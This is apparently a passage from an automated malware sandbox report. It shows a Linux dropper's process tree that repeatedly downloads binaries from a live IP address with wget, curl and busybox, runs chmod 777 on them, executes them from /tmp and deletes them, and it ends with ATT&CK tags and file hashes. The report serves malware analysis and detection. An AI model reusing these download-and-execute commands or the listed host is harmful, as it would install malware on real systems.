-
-
/bin/rmrm IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:936
-
-
/bin/chmodchmod 777 XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5./XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:942
-
-
/bin/chmodchmod 777 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B./GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:948
-
-
/bin/chmodchmod 777 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg./GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:954
-
-
/bin/chmodchmod 777 Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw./Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:960
-
-
/bin/chmodchmod 777 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH./3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:966
-
-
/bin/chmodchmod 777 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h./q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:972
-
-
/bin/chmodchmod 777 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM./eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:975
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97